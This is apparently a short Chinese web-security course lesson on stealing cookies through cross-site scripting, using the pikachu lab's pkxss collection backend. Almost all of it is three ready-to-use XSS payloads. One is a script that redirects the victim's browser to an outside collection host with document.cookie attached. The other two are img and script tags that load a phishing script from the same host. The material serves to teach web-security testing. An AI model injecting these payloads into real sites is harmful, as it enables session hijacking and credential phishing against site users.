风炫安全WEB安全学习第二十三节课 利用XSS获取COOKIE

风炫安全WEB安全学习第二十三节课 利用XSS获取COOKIE

XSS如何利用

获取COOKIE

我们使用pikachu写的pkxss后台

使用方法：

<script>document.location='http://fx.com/pikachu/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>

<img src="http://fx.com/pikachu/pkxss/xfish/xfish.php" />

<script src="http://fx.com/pikachu/pkxss/xfish/xfish.php"></script>

参考：
http://blog.evalshell.com/2020/12/20/%e9%a3%8e%e7%82%ab%e5%ae%89%e5%85%a8web%e5%ae%89%e5%85%a8%e5%ad%a6%e4%b9%a0%e7%ac%ac%e4%ba%8c%e5%8d%81%e4%b8%89%e8%8a%82%e8%af%be-%e5%88%a9%e7%94%a8xss%e8%8e%b7%e5%8f%96cookie/